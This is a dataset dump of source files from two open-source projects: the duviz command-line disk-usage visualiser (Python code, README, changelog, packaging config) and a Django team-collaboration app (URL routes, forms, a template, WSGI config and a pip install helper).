(cycling through given color codes)\"\"\"\n color_cycle = itertools.cycle(colors)\n\n def colorize(line: str) -> str:\n line = re.sub(cls._START, lambda m: next(color_cycle), line)\n line = re.sub(cls._END, cls._COLOR_RESET, line)\n return line\n\n return colorize\n\n @classmethod\n def get_colorize_rgy(cls):\n return cls._get_colorize(cls._COLOR_CYCLE_RGY)\n\n @classmethod\n def get_colorize_bmc(cls):\n return cls._get_colorize(cls._COLOR_CYCLE_BMC)\n\n\nclass ColorDoubleLineBarRenderer(AsciiDoubleLineBarRenderer):\n \"\"\"\n Render a SizeTree with two line ANSI color bars,\n \"\"\"\n\n _top_line_fill = None\n _colorizer = Colorizer()\n\n def render_node(self, node: SizeTree, width: int) -> List[str]:\n return [\n self._colorizer.wrap(self.bar(\n label=node.name,\n width=width, fill=' ', left='', right='', small=' ',\n )),\n self._colorizer.wrap(self.bar(\n label=self._size_formatter.format(node.size),\n width=width, fill=' ', left='', right='', small=' ',\n )),\n ]\n\n def render(self, tree: SizeTree, width: int) -> List[str]:\n lines = super().render(tree=tree, width=width)\n colorize_cycle = itertools.cycle([\n self._colorizer.get_colorize_rgy(),\n self._colorizer.get_colorize_rgy(),\n self._colorizer.get_colorize_bmc(),\n self._colorizer.get_colorize_bmc(),\n ])\n return [colorize(line) for (line, colorize) in zip(lines, colorize_cycle)]\n\n def _str_len(self, b: str) -> int:\n return self._colorizer.str_len(b)\n\n\nclass ColorSingleLineBarRenderer(AsciiSingleLineBarRenderer):\n \"\"\"\n Render a SizeTree with one line ANSI color bars,\n 
\"\"\"\n\n _top_line_fill = None\n _colorizer = Colorizer()\n\n def render_node(self, node: SizeTree, width: int) -> List[str]:\n return [\n self._colorizer.wrap(self.bar(\n label=\"{n}: {s}\".format(n=node.name, s=self._size_formatter.format(node.size)),\n width=width, fill=' ', left='', right='', small=' ',\n ))\n ]\n\n def render(self, tree: SizeTree, width: int) -> List[str]:\n lines = super().render(tree=tree, width=width)\n colorize_cycle = itertools.cycle([\n self._colorizer.get_colorize_rgy(),\n self._colorizer.get_colorize_bmc(),\n ])\n return [colorize(line) for (line, colorize) in zip(lines, colorize_cycle)]\n\n def _str_len(self, b: str) -> int:\n return self._colorizer.str_len(b)\n\n\ndef get_progress_reporter(\n max_interval: float = 1,\n terminal_width: int = 80,\n write: Callable[[str], Any] = sys.stdout.write,\n time: Callable[[], float] = time.time,\n) -> Callable[[str], None]:\n \"\"\"\n Create a progress reporting function that only actually prints in intervals\n \"\"\"\n next_time = 0.0\n # Start printing frequently.\n interval = 0.0\n\n def progress(info: str):\n nonlocal next_time, interval\n if time() > next_time:\n write(info.ljust(terminal_width)[:terminal_width] + '\\r')\n next_time = time() + interval\n # Converge to max interval.\n interval = 0.9 * interval + 0.1 * max_interval\n\n return progress\n\n\ndef main():\n terminal_width = shutil.get_terminal_size().columns\n\n # Handle commandline interface.\n cli = argparse.ArgumentParser(\n prog=\"duviz\",\n description=\"Render ASCII-art representation of disk space usage.\",\n )\n cli.add_argument(\"--version\", action=\"version\", version=f\"%(prog)s {__version__}\")\n cli.add_argument(\n \"paths\",\n metavar=\"PATH\",\n nargs=\"*\",\n help=\"Directories or ZIP/tar archives to scan\",\n default=[\".\"],\n )\n cli.add_argument(\n \"-w\",\n \"--width\",\n type=int,\n dest=\"display_width\",\n default=terminal_width,\n help=\"total width of all bars\",\n metavar=\"WIDTH\",\n )\n cli.add_argument(\n \"-x\",\n \"--one-file-system\",\n action=\"store_true\",\n dest=\"one_file_system\",\n default=False,\n help=\"skip directories on different filesystems\",\n )\n cli.add_argument(\n \"-L\",\n \"--dereference\",\n action=\"store_true\",\n dest=\"dereference\",\n default=False,\n help=\"dereference all symbolic links\",\n )\n cli.add_argument(\n \"--max-depth\",\n action=\"store\",\n type=int,\n dest=\"max_depth\",\n default=5,\n help=\"maximum recursion depth\",\n metavar=\"N\",\n )\n cli.add_argument(\n \"-i\",\n \"--inodes\",\n action=\"store_true\",\n dest=\"inode_count\",\n default=False,\n help=\"count inodes instead of file size\",\n )\n cli.add_argument(\n \"--no-progress\",\n action=\"store_false\",\n dest=\"show_progress\",\n default=True,\n help=\"disable progress reporting\",\n )\n cli.add_argument(\n \"-1\",\n \"--one-line\",\n action=\"store_true\",\n dest=\"one_line\",\n default=False,\n help=\"Show one line bars instead of two line bars\",\n )\n cli.add_argument(\n \"-c\",\n \"--color\",\n action=\"store_true\",\n dest=\"color\",\n default=False,\n help=\"Use colors to render bars (instead of ASCII art)\",\n )\n cli.add_argument(\n # TODO short option, \"-z\"?\n \"--zip\",\n action=\"store_true\",\n dest=\"zip\",\n help=\"Force ZIP-file handling of given paths (e.g. 
lacking a traditional `.zip` extension).\",\n )\n cli.add_argument(\n \"--unzip-size\",\n action=\"store_true\",\n help=\"Visualize decompressed file size instead of compressed file size for ZIP files.\",\n )\n cli.add_argument(\n # TODO short option?\n \"--tar\",\n action=\"store_true\",\n dest=\"tar\",\n help=\"\"\"\n Force tar-file handling of given paths\n (e.g. lacking a traditional extension like `.tar`, `.tar.gz`, ...).\n \"\"\",\n )\n\n args = cli.parse_args()\n\n # Make sure we have a valid list of paths\n paths: List[str] = []\n for path in args.paths:\n if os.path.exists(path):\n paths.append(path)\n else:\n sys.stderr.write('Warning: not a valid path: \"%s\"\\n' % path)\n\n if args.show_progress:\n progress_report = get_progress_reporter(terminal_width=args.display_width)\n else:\n progress_report = None\n\n for path in paths:\n if args.zip or (\n os.path.isfile(path) and os.path.splitext(path)[1].lower() == \".zip\"\n ):\n tree = ZipFileProcessor.from_zipfile(path, compressed=not args.unzip_size)\n size_formatter = SIZE_FORMATTER_BYTES\n elif args.tar or (\n os.path.isfile(path)\n and any(\n path.endswith(ext) for ext in {\".tar\", \".tar.gz\", \".tgz\", \"tar.bz2\"}\n )\n ):\n tree = TarFileProcessor().from_tar_file(path)\n size_formatter = SIZE_FORMATTER_BYTES\n elif args.inode_count:\n tree = InodeProcessor.from_ls(root=path, progress_report=progress_report)\n size_formatter = SIZE_FORMATTER_COUNT\n else:\n tree = DuProcessor.from_du(\n root=path,\n one_filesystem=args.one_file_system,\n dereference=args.dereference,\n progress_report=progress_report,\n )\n size_formatter = SIZE_FORMATTER_BYTES\n\n max_depth = args.max_depth\n if args.one_line:\n if args.color:\n renderer = ColorSingleLineBarRenderer(\n max_depth=max_depth, size_formatter=size_formatter\n )\n else:\n renderer = AsciiSingleLineBarRenderer(\n max_depth=max_depth, size_formatter=size_formatter\n )\n else:\n if args.color:\n renderer = ColorDoubleLineBarRenderer(\n max_depth=max_depth, size_formatter=size_formatter\n )\n else:\n renderer = AsciiDoubleLineBarRenderer(\n max_depth=max_depth, size_formatter=size_formatter\n )\n\n print(\"\\n\".join(renderer.render(tree, width=args.display_width)))\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5731250047683716,
"alphanum_fraction": 0.590624988079071,
"avg_line_length": 44.71428680419922,
"blob_id": "00c8f402002e0973c54f743617360771bc186bb4",
"content_id": "6fcbad018f0191349415835a382f806f744663f0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 4800,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 105,
"path": "/README.rst",
"repo_name": "soxofaan/duviz",
"src_encoding": "UTF-8",
"text": ".. image:: https://img.shields.io/pypi/pyversions/duviz\n :target: https://pypi.org/project/duviz/\n :alt: PyPI - Python Version\n.. image:: https://github.com/soxofaan/duviz/actions/workflows/unittests.yml/badge.svg?branch=main\n :target: https://github.com/soxofaan/duviz/actions/workflows/unittests.yml\n :alt: unit tests\n.. image:: https://github.com/soxofaan/duviz/actions/workflows/pre-commit.yml/badge.svg?branch=main\n :target: https://github.com/soxofaan/duviz/actions/workflows/pre-commit.yml\n :alt: pre-commit\n\n\nWhat is duviz?\n--------------\n\n``duviz`` is a (Python 3) command-line tool to visualize disk space usage.\n\nIt's like the plethora of desktop applications and widgets\n(e.g. Filelight, DaisyDisk, WinDirStat, JDiskReport, TreeSize, SpaceSniffer, ...),\nbut instead of a fancy GUI with animated pie charts and shaded boxes\nyou get a funky \"ASCII art style hierarchical tree of bars\" in your shell.\nIf that didn't make a lot of sense to you, look at this example of this ``/opt`` folder::\n\n $ duviz /opt\n ________________________________________________________________________________\n [ /opt ]\n [____________________________________3.30GB____________________________________]\n [ local ]\n [____________________________________3.30GB____________________________________]\n [ var ][ lib ][ share ][Libr][lib][]|\n [_____________1.36GB____________][______925.47MB______][411.37MB][231.][222][]|\n [ macports ]|[gcc][gcc4][]||| [][]||||||[Fra]|[gc] |\n [____________1.36GB____________]|[250][226.][]||| [][]||||||[231]|[21] |\n [ software ][distfile][]| | || | | ||||||||[Pyt] [x8]\n [____785.31MB____][421.56MB][]| | || | | ||||||||[231] [21]\n [gc][][]||||||||||||||||||||[] | ||| | [Ve] ||[]\n [17][][]||||||||||||||||||||[] | ||| | [23] ||[]\n\n\nFeatures\n--------\n\n- Basically it consists of just one Python 3 script ``duviz.py``.\n No installation required: put it where you want it. Use it how you want it.\n- Only uses standard library and just depends on ``du`` and ``ls`` utilities,\n which are available out of the box on a typical Unix platform (Linux, macOS)\n- Speed. No need to wait for a GUI tool to get up and running, let alone scanning your disk.\n The hard work is done by ``du`` (or ``ls``), which run an C-speed.\n- Progress reporting while you wait. 
Be hypnotized!\n- Detects your terminal width for maximum visualization pleasure.\n- Not only supports \"disk usage\" based on file size,\n but also allows to count files (inode count mode)\n or give a size breakdown of ZIP or tar files.\n- Option to use terminal colors for the boxes instead of ASCII art\n\n\nInstallation\n------------\n\nPip based\n duviz can be installed with pip in a desired virtual environment::\n\n pip install duviz\n\n which will install a ``duviz`` command line utility in your environment.\n\n If you already have `pipx <https://pypa.github.io/pipx/>`_ on your toolbelt,\n you might prefer to install duviz in an automatically managed,\n isolated environment with ``pipx install duviz``.\n\nWith Homebrew\n duviz can also be installed with `Homebrew <https://brew.sh/>`_\n through the `soxofaan/duviz <https://github.com/soxofaan/homebrew-duviz>`_ tap::\n\n brew install soxofaan/duviz/duviz\n\nNo installation\n The file ``duviz.py`` is also designed to be usable as a standalone Python script,\n without having to install it.\n Download ``duviz.py`` and just run it::\n\n python path/to/duviz.py\n\n\nPython 2 Support\n~~~~~~~~~~~~~~~~\n\n``duviz`` was originally (2009) a Python 2 script, and started supporting Python 3 around 2016.\nWith the end of life of Python 2 nearing in 2019, support for Python 2 was dropped.\nThe Python 2 compatible version can be found in the ``py2-compatible`` branch (last release: 1.1.1).\n\nUsage\n-----\n\nIf you run ``duviz`` without arguments, it will render the disk usage of the current working folder.\nIf you specify one or more directories, it will render the usage of those directories, how intuitive is that!\n\nInstead of size in bytes, you can also get inode usage: just use the option ``--inodes`` (or ``-i`` in short).\n\nIf you directly pass ``duviz`` a ZIP or tar file,\nit will visualize the size breakdown of the file tree in the ZIP/tar file.\nIn case of ZIP files, the compressed size will be shown by default\n(option ``--unzip-size`` will toggle showing of decompressed size).\nFor tar files, only the decompressed size is available.\n\nRun it with option ``--help`` for more options.\n"
},
{
"alpha_fraction": 0.6419752836227417,
"alphanum_fraction": 0.7114197611808777,
"avg_line_length": 27.573530197143555,
"blob_id": "096ff5f441d5ef00d56deb4ac53c525d40d0224d",
"content_id": "36ad382f3d13dee202fe0732658103c3e5dd6786",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1944,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 68,
"path": "/CHANGELOG.md",
"repo_name": "soxofaan/duviz",
"src_encoding": "UTF-8",
"text": "\n# Duviz Changelog\n\n\n## [Unreleased]\n\n- Migrate to `pyproject.toml` based project metadata\n and `hatchling` based packaging\n ([#15](https://github.com/soxofaan/duviz/issues/15))\n- Bring back CLI option `--version` to show current version.\n ([#29](https://github.com/soxofaan/duviz/issues/29))\n\n\n## [3.2.0] - 2022-12-18\n\n- Replace `optparse` usage with `argparse`\n ([#10](https://github.com/soxofaan/duviz/issues/10))\n- Drop Python 3.5 support ([#27](https://github.com/soxofaan/duviz/issues/27))\n- New feature: size breakdown of ZIP and tar files ([#20](https://github.com/soxofaan/duviz/issues/20))\n\n\n## [3.1.2] - 2022-12-09\n\n- Add test runs for Python 3.10 and 3.11\n- Add more type hinting\n- Add `pipx` installation instructions ([#23](https://github.com/soxofaan/duviz/issues/23))\n- Start using `pre-commit` for automated code style issue detection and fixing\n- Start using `darker` for incrementally applying \"black\" code style\n ([#21](https://github.com/soxofaan/duviz/issues/21))\n\n\n## [3.1.1] - 2022-09-01\n\n- Replace Travis CI with GitHub Actions\n\n\n## [3.1.0] - 2019-11-12\n\n- Add option `--color` to render with old-fashioned ANSI colors\n instead of old-fashioned ASCII art\n- Start using pytest for unit tests\n- Bring back progress reporting after 3.0.0 refactor\n\n\n## [3.0.0] - 2019-10-20\n\n- Refactor size tree code for better encapsulation\n- Refactor render code to allow different render styles\n- Start using type hinting\n- Add option `--one-line` to do \"single line bar\" rendering\n\n\n## [2.0.1] - 2019-10-20\n\n- Replace custom terminal size detection code with `shutil.get_terminal_size` (Issue #6)\n- Trying out https://deepsource.io/ for static code analysis\n- Add Travis run for Python 3.8 (instead of 3.8-dev)\n\n\n## [2.0.0] - 2019-10-20\n\n- Dropped Python 2 support\n- Python 3 related code cleanups and fine-tuning\n\n\n## [1.1.1] - 2019-10-20\n\n- Probably last release supporting Python 2\n- Added Homebrew formula and instructions\n"
},
{
"alpha_fraction": 0.6233283877372742,
"alphanum_fraction": 0.639673113822937,
"avg_line_length": 22.61403465270996,
"blob_id": "e7775876e27f38ac9472145bc2b708465559e89a",
"content_id": "88289abae0ba7b0407a08828d0fae4b424458bd9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 1346,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 57,
"path": "/pyproject.toml",
"repo_name": "soxofaan/duviz",
"src_encoding": "UTF-8",
"text": "[project]\nname = \"duviz\"\ndescription = \"Command line disk space visualization tool\"\nreadme = \"README.rst\"\nlicense = \"MIT\"\nauthors = [\n { name = \"Stefaan Lippens\", email = \"[email protected]\" },\n]\ndynamic = [\"version\"]\nrequires-python = \">=3.5\"\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"Topic :: System :: Systems Administration\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Programming Language :: Python :: 3 :: Only\",\n]\nkeywords = [\n \"disk usage\",\n \"visualization\",\n \"ascii-art\",\n \"cli\",\n]\n\n[project.urls]\nHomepage = \"https://github.com/soxofaan/duviz\"\nSource = \"https://github.com/soxofaan/duviz\"\nTracker = \"https://github.com/soxofaan/duviz/issues\"\n\n[project.scripts]\nduviz = \"duviz:main\"\n\n\n[build-system]\nrequires = [\"hatchling\"]\nbuild-backend = \"hatchling.build\"\n\n[tool.hatch.version]\nsource = \"regex\"\npath = \"duviz.py\"\n\n[tool.hatch.build]\ninclude = [\n \"duviz.py\",\n]\n\n\n[tool.black]\nline-length = 120\n"
}
] | 5 |
vmilasin/zavrsni_rad | https://github.com/vmilasin/zavrsni_rad | 9def73d79e1aca65ba3f8d72e4734eea52b506a4 | 521b88d541baf9f9eec7cd7f3ef0c92eba784eba | cece4e25ba5733f935fab5c0ef22db2b130281eb | refs/heads/master | 2020-12-30T13:46:03.981932 | 2017-05-14T14:33:18 | 2017-05-14T14:33:18 | 61,121,584 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6573852300643921,
"avg_line_length": 87.91802978515625,
"blob_id": "d02b5241729abd8b859d88ac56c4a3c7825613b2",
"content_id": "a7afc0544c0f5b7cb0d3408f8828f21f2fd748ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5423,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 61,
"path": "/lfg_app/urls.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.index, name='index'),\n\turl(r'^registration/$', views.registration, name='registration'),\n\turl(r'^registration_in_use/$', views.registration_in_use, name='registration_in_use'),\n\turl(r'^registration_success/$', views.registration_success, name='registration_success'),\n\turl(r'^login/disabled/$', views.account_disabled, name='account_disabled'),\n\turl(r'^login/$', views.login, name='login'),\n\turl(r'^logout/$', views.logout, name='logout'),\n\turl(r'^start/$', views.start, name='start'),\n\turl(r'^user_management/$', views.user_management, name='user_management'),\n\turl(r'^user_about_me/(?P<user_id>[0-9]+)/$', views.user_about_me, name='user_about_me'),\n\turl(r'^user_overview/(?P<user_id>[0-9]+)/$', views.user_overview, name='user_overview'),\t\n\turl(r'^del_user_status/(?P<status_id>[0-9]+)/$', views.del_user_status, name='del_user_status'),\n\turl(r'^user_friends/(?P<user_id>[0-9]+)/$', views.user_friends, name='user_friends'),\n\turl(r'^user_requests/$', views.user_requests, name='user_requests'),\n\turl(r'^friendship_processing/(?P<request_id>[0-9]+)/(?P<accepted>[0-9]+)/$', views.friendship_processing, name='friendship_processing'),\n\turl(r'^unfriend/(?P<request_id>[0-9]+)/$', views.unfriend, name='unfriend'),\n\turl(r'^user_teams/(?P<user_id>[0-9]+)/$', views.user_teams, name='user_teams'),\n\turl(r'^user_invitations/$', views.user_invitations, name='user_invitations'),\n\turl(r'^invitation_processing/(?P<request_id>[0-9]+)/(?P<accepted>[0-9]+)/$', views.invitation_processing, name='invitation_processing'),\n\turl(r'^leave_team/(?P<membership_id>[0-9]+)/$', views.leave_team, name='leave_team'),\n\turl(r'^user_reviews/(?P<user_id>[0-9]+)/$', views.user_reviews, name='user_reviews'),\n\turl(r'^review_user/(?P<user_reviewed>[0-9]+)/$', views.review_user, name='review_user'),\n\turl(r'^review_team/(?P<team_id>[0-9]+)/$', views.review_team, name='review_team'),\n\turl(r'^user_inbox/$', views.user_inbox, name='user_inbox'),\n\turl(r'^user_outbox/$', views.user_outbox, name='user_outbox'),\n\turl(r'^message_compose/(?P<reciever_id>[0-9]+)/$', views.message_compose, name='message_compose'),\n\turl(r'^message_read/(?P<message_id>[0-9]+)/$', views.message_read, name='message_read'),\n\turl(r'^search_category/$', views.search_category, name='search_category'),\n\turl(r'^search_subcategory/(?P<category_id>[0-9]+)/$', views.search_subcategory, name='search_subcategory'),\n\turl(r'^search_teams_in_cat/(?P<category_id>[0-9]+)/(?P<subcategory>[0-9]+)/$', views.search_teams_in_cat, name='search_teams_in_cat'),\n\turl(r'^search_teams/$', views.search_teams, name='search_teams'),\n\turl(r'^search_users/$', views.search_users, name='search_users'),\n\turl(r'^team_creation/$', views.team_creation, name='team_creation'),\n\turl(r'^team_creation_success/(?P<team_id>[0-9]+)/$', views.team_creation_success, name='team_creation_success'),\n\turl(r'^team_management/(?P<team_id>[0-9]+)/$', views.team_management, name='team_management'),\n\turl(r'^team_about_us/(?P<team_id>[0-9]+)/$', views.team_about_us, name='team_about_us'),\n\turl(r'^team_overview/(?P<team_id>[0-9]+)/$', views.team_overview, name='team_overview'),\n\turl(r'^del_team_status/(?P<team_id>[0-9]+)/(?P<status_id>[0-9]+)/$', views.del_team_status, name='del_team_status'),\n\turl(r'^team_members/(?P<team_id>[0-9]+)/$', views.team_members, 
name='team_members'),\n\turl(r'^team_membership_management/(?P<team_id>[0-9]+)/(?P<member_id>[0-9]+)/$', views.team_membership_management, name='team_membership_management'),\n\turl(r'^kick_member/(?P<team_id>[0-9]+)/(?P<member_id>[0-9]+)/$', views.kick_member, name='kick_member'),\n\turl(r'^team_invitation/(?P<team_id>[0-9]+)/$', views.team_invitation, name='team_invitation'),\n\turl(r'^team_invitation_creation/(?P<team_id>[0-9]+)/(?P<user_id>[0-9]+)/$', views.team_invitation_creation, name='team_invitation_creation'),\n\turl(r'^team_tasks/(?P<team_id>[0-9]+)/$', views.team_tasks, name='team_tasks'),\n\turl(r'^team_tasks_creation/(?P<team_id>[0-9]+)/$', views.team_tasks_creation, name='team_tasks_creation'),\n\turl(r'^task_finish/(?P<team_id>[0-9]+)/(?P<task_id>[0-9]+)/$', views.task_finish, name='task_finish'),\n\turl(r'^team_subtasks/(?P<team_id>[0-9]+)/(?P<task_id>[0-9]+)/$', views.team_subtasks, name='team_subtasks'),\n\turl(r'^team_subtasks_creation/(?P<team_id>[0-9]+)/(?P<task_id>[0-9]+)/$', views.team_subtasks_creation, name='team_subtasks_creation'),\n\turl(r'^subtask_finish/(?P<team_id>[0-9]+)/(?P<task_id>[0-9]+)/(?P<subtask_id>[0-9]+)/$', views.subtask_finish, name='subtask_finish'),\n\turl(r'^team_reviews/(?P<team_id>[0-9]+)/$', views.team_reviews, name='team_reviews'),\n\turl(r'^team_forum/(?P<team_id>[0-9]+)/$', views.team_forum, name='team_forum'),\n\turl(r'^team_forum_creation/(?P<team_id>[0-9]+)/$', views.team_forum_creation, name='team_forum_creation'),\n\turl(r'^team_forum_threads/(?P<team_id>[0-9]+)/(?P<forum_id>[0-9]+)/$', views.team_forum_threads, name='team_forum_threads'),\n\turl(r'^team_forum_threads_creation/(?P<team_id>[0-9]+)/(?P<forum_id>[0-9]+)/$', views.team_forum_threads_creation, name='team_forum_threads_creation'),\t\n\turl(r'^team_forum_posts/(?P<team_id>[0-9]+)/(?P<forum_id>[0-9]+)/(?P<thread_id>[0-9]+)/$', views.team_forum_posts, name='team_forum_posts'),\n\turl(r'^team_forum_posts_creation/(?P<team_id>[0-9]+)/(?P<forum_id>[0-9]+)/(?P<thread_id>[0-9]+)/$', views.team_forum_posts_creation, name='team_forum_posts_creation'),\n]"
},
{
"alpha_fraction": 0.7022222280502319,
"alphanum_fraction": 0.7022222280502319,
"avg_line_length": 17.75,
"blob_id": "dc64ef95e7c4ce0afb3254b1a4b3163b1857521c",
"content_id": "f0f66ecc015b46280883a344dc85d9527979786e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/pip_install.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "import pip\nfrom subprocess import call\n\nrequirements = []\n\nr = open('requirements.txt', 'r')\nfor line in r:\n requirements.append(line)\nr.close()\n\nfor package in requirements:\n call(\"pip install \" + package, shell=True)\n"
},
{
"alpha_fraction": 0.47074466943740845,
"alphanum_fraction": 0.47429078817367554,
"avg_line_length": 32.20588302612305,
"blob_id": "dee5750d8f9189b155d1f2dc40e34eb843cd7c4b",
"content_id": "92c6d6b65dd3368c112297a71403db4eb0dce6f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1128,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 34,
"path": "/lfg_app/templates/lfg_app/user_reviews.html",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "{% extends \"base_start_user.html\" %}\n{% load staticfiles %}\n\n{% block data %}\n<div class=\"context\">\n <h1>Reviews:</h1>\n <div class=\"context_data\">\n <ul>\n {% for result in pages %}\n <l1>\n <div class=\"post\">\n <div class=\"post_user\"><p>{{ result.reviewed_by.first_name|title }} {{ result.reviewed_by.last_name|title }} ({{ result.date_created|date:\"d.m.Y. H:i\" }}): {{ result.rating }}</p></div>\n <div class=\"post_content\"><pre>{{ result.content }}</pre></div>\n </div>\n </l1>\n {% endfor %}\n </ul>\n <br>\n </div>\n\t<div class=\"pagination\">\n \t<span class=\"step-links\">\n \t{% if pages.has_previous %}\n \t<a href=\"?page={{ pages.previous_page_number }}\">Previous</a>\n \t{% endif %}\n \t<span class=\"current\">\n \tPage {{ pages.number }} of {{ pages.paginator.num_pages }}.\n \t</span>\n \t{% if pages.has_next %}\n \t<a href=\"?page={{ pages.next_page_number }}\">Next</a>\n \t{% endif %}\n \t</span>\n\t</div>\n</div>\n{% endblock data %}"
},
{
"alpha_fraction": 0.7629716992378235,
"alphanum_fraction": 0.7676886916160583,
"avg_line_length": 29.321428298950195,
"blob_id": "8a3f7c61bc7fcfd34ffc54ebd424a8c327b12f81",
"content_id": "a5a7b86342baa504bbb7e741e2d7f3975ed6b581",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 848,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 28,
"path": "/lfg/wsgi.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "\"\"\"\nWSGI config for lfg project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/\n\"\"\"\n\nimport os\nimport sys\nimport site\nfrom django.core.wsgi import get_wsgi_application\n\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"lfg.settings\"\n\napplication = get_wsgi_application()\n\n# Add the site-packages of the chosen virtualenv to work with\nsite.addsitedir('~/.virtualenvs/lfg/lib/python2.7/site-packages')\n\n# Add the app's directory to the PYTHONPATH\nsys.path.append('/home/vlafa/Desktop/Projekti/lfg_project')\nsys.path.append('/home/vlafa/Desktop/Projekti/lfg_project/lfg')\n\n# Activate your virtual env\nactivate_env=os.path.expanduser(\"~/.virtualenvs/lfg/bin/activate_this.py\")\nexecfile(activate_env, dict(__file__=activate_env))"
},
{
"alpha_fraction": 0.6986541748046875,
"alphanum_fraction": 0.7053832411766052,
"avg_line_length": 22.258502960205078,
"blob_id": "a3a93d97649d52bfeb453abf776e5a9fd85bbc66",
"content_id": "3e324c87a46fa673ee31af84cd82fd7d19215206",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3418,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 147,
"path": "/lfg_app/forms.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom . import models\nfrom django.contrib.auth.models import User\nfrom django.forms import extras\n\n\nclass UserSearchForm(forms.Form):\n\tusername = forms.CharField()\n\nclass TeamSearchForm(forms.Form):\n\tteam = forms.CharField()\n\nclass CategorySearchForm(forms.Form):\n\tcategory = forms.CharField()\n\nclass SubCategorySearchForm(forms.Form):\n\tsubcategory = forms.CharField()\n\n\nclass LoginForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ['username', 'password']\n\t\thelp_texts = {\n\t\t\t'username':'',\n\t\t\t'password':''\n\t\t}\n\t\tlabels = {\n\t\t\t'username':'',\n\t\t\t'password':''\n\t\t}\n\t\twidgets = {\n\t\t\t'username': forms.TextInput(attrs = {'placeholder': 'Username'}),\n\t\t\t'password': forms.PasswordInput(attrs = {'placeholder': 'Password'}),\n\t\t}\n\nclass UserRegistrationForm(forms.ModelForm):\t\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ['username', 'password', 'email', 'first_name', 'last_name']\n\t\thelp_texts = {\n\t\t\t'username':'',\n\t\t\t'password':'',\n\t\t\t'email':'',\n\t\t\t'first_name':'',\n\t\t\t'last_name':''\n\t\t}\n\n\nclass UserManagementForm(forms.Form):\n\tfirst_name = forms.CharField(required=False, max_length=256)\n\tlast_name = forms.CharField(required=False, max_length=256)\n\tbirthday = forms.DateField(required=False, widget=extras.SelectDateWidget(years=range(1930,2015)))\n\temail = forms.EmailField(required=False)\n\tcountry = forms.CharField(required=False, max_length=100)\n\tcity = forms.CharField(required=False, max_length=100)\n\taddress = forms.CharField(required=False, max_length=200)\n\timage = forms.ImageField(required=False)\n\tabout_me = forms.CharField(required=False, widget=forms.Textarea)\n\n\nclass NewCategoryForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Category\n\t\tfields = ['category']\n\nclass NewSubcategoryForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.SubCategory\n\t\tfields = ['subcategory']\n\n\nclass TeamCreationForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.TeamProfile\n\t\tfields = ['name', 'category', 'description']\n\nclass TeamManagementForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.TeamProfile\n\t\tfields = ['name', 'recruiting', 'country', 'city', 'address', 'image', 'description']\n\nclass MembershipManagementForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Membership\n\t\tfields = ['user_type']\n\n\nclass TaskForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Tasks\n\t\tfields = ['task', 'description', 'priority']\n\nclass SubTaskForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.SubTasks\n\t\tfields = ['subtask', 'description']\t\t\n\n\nclass ForumForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Forum\n\t\tfields = ['title']\n\nclass ThreadForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Thread\n\t\tfields = ['title']\n\nclass PostForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Post\n\t\tfields = ['title', 'content']\n\n\nclass MessageForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.Message\n\t\tfields = ['title', 'content']\n\n\nclass UserReviewForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.UserReview\n\t\tfields = ['rating', 'content']\n\nclass TeamReviewForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel= 